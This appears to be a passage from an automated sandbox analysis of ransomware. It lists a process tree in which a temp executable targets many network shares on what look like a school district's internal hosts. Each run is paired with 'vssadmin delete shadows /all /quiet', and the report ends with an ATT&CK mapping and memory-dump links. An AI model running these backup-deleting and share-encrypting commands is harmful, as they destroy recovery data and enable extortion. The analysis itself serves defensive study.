delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1800

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM12.IN.NPS.K12.MA.US\E$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2524

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1508

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM12.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2516

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2004

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM12.IN.NPS.K12.MA.US\Backups" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2508

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:1476

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM02.IN.NPS.K12.MA.US\POSData" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2500

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1032

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM02.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2492

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:336

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS5.IN.NPS.K12.MA.US\transfers" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2456

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2060

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS5.IN.NPS.K12.MA.US\StaffHome" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2448

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2704

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS5.IN.NPS.K12.MA.US\DirectoryFolder" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2440

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:968

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS5.IN.NPS.K12.MA.US\D$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2432

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1532

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS5.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2424

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:2680

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NES3020BOYSLCKR.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2416

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2292

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NISROOM140DESK.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2408

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2304

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NISROOM113.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2400

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2960

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NHS-FRONT-MP.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2392

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:988

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y37$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2384

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:2756

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y36$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2376

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:108

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y35$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2368

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1624

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y34$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2360

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:2752

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y33$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2352

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2956

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y32$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2324

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:2784

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y30$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2292

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1984

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y27$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2248

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1404

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y24$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2192

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1212

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2712

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1157201969-1192210365338167483-1816017564-938165253-18329162611666491813-1101048696"
1⤵
PID:1176

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1688143480668224562-3302969921241029092-1340944288-12950544661894040391378158261"
1⤵
PID:1928

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/336-123-0x0000000000000000-mapping.dmp

Download
memory/556-134-0x0000000000000000-mapping.dmp

Download
memory/560-138-0x0000000000000000-mapping.dmp

Download
memory/568-75-0x0000000000000000-mapping.dmp

Download
memory/672-72-0x0000000000000000-mapping.dmp

Download
memory/788-101-0x0000000000000000-mapping.dmp

Download
memory/796-79-0x0000000000000000-mapping.dmp

Download
memory/808-128-0x0000000000000000-mapping.dmp

Download
memory/824-83-0x0000000000000000-mapping.dmp

Download
memory/852-126-0x0000000000000000-mapping.dmp

Download
memory/924-104-0x0000000000000000-mapping.dmp

Download
memory/936-71-0x0000000000000000-mapping.dmp

Download
memory/948-65-0x0000000000000000-mapping.dmp

Download
memory/956-96-0x0000000000000000-mapping.dmp

Download
memory/972-81-0x0000000000000000-mapping.dmp

Download
memory/988-120-0x0000000000000000-mapping.dmp

Download
memory/1084-109-0x0000000000000000-mapping.dmp

Download
memory/1092-88-0x0000000000000000-mapping.dmp

Download
memory/1140-112-0x0000000000000000-mapping.dmp

Download
memory/1144-92-0x0000000000000000-mapping.dmp

Download
memory/1176-82-0x0000000000000000-mapping.dmp

Download
memory/1192-100-0x0000000000000000-mapping.dmp

Download
memory/1196-132-0x0000000000000000-mapping.dmp

Download
memory/1212-74-0x0000000000000000-mapping.dmp

Download
memory/1248-133-0x0000000000000000-mapping.dmp

Download
memory/1296-140-0x0000000000000000-mapping.dmp

Download
memory/1340-58-0x0000000000000000-mapping.dmp

Download
memory/1516-62-0x0000000000000000-mapping.dmp

Download
memory/1520-54-0x0000000000000000-mapping.dmp

Download
memory/1536-55-0x0000000000000000-mapping.dmp

Download
memory/1536-57-0x0000000075CF1000-0x0000000075CF3000-memory.dmp

Filesize
8KB

Download
memory/1572-127-0x0000000000000000-mapping.dmp

Download
memory/1588-116-0x0000000000000000-mapping.dmp

Download
memory/1600-124-0x0000000000000000-mapping.dmp

Download
memory/1628-76-0x0000000000000000-mapping.dmp

Download
memory/1632-80-0x0000000000000000-mapping.dmp

Download
memory/1636-113-0x0000000000000000-mapping.dmp

Download
memory/1648-105-0x0000000000000000-mapping.dmp

Download
memory/1656-108-0x0000000000000000-mapping.dmp

Download
memory/1692-67-0x0000000000000000-mapping.dmp

Download
memory/1716-63-0x0000000000000000-mapping.dmp

Download
memory/1728-56-0x0000000000000000-mapping.dmp

Download
memory/1740-117-0x0000000000000000-mapping.dmp

Download
memory/1772-89-0x0000000000000000-mapping.dmp

Download
memory/1780-142-0x0000000000000000-mapping.dmp

Download
memory/1900-69-0x0000000000000000-mapping.dmp

Download
memory/1928-84-0x0000000000000000-mapping.dmp

Download
memory/1940-93-0x0000000000000000-mapping.dmp

Download
memory/1964-97-0x0000000000000000-mapping.dmp

Download
memory/2016-77-0x0000000000000000-mapping.dmp

Download
memory/2040-86-0x0000000000000000-mapping.dmp

Download
memory/2072-144-0x0000000000000000-mapping.dmp

Download
memory/2096-146-0x0000000000000000-mapping.dmp

Download
memory/2120-148-0x0000000000000000-mapping.dmp

Download
memory/2144-150-0x0000000000000000-mapping.dmp

Download
memory/2160-152-0x0000000000000000-mapping.dmp

Download
memory/2192-154-0x0000000000000000-mapping.dmp

Download
memory/2212-155-0x0000000000000000-mapping.dmp

Download
memory/2232-158-0x0000000000000000-mapping.dmp

Download
memory/2248-160-0x0000000000000000-mapping.dmp

Download
memory/2264-162-0x0000000000000000-mapping.dmp

Download
memory/2280-164-0x0000000000000000-mapping.dmp

Download
memory/2292-165-0x0000000000000000-mapping.dmp

Download
memory/2312-168-0x0000000000000000-mapping.dmp

Download
memory/2324-169-0x0000000000000000-mapping.dmp

Download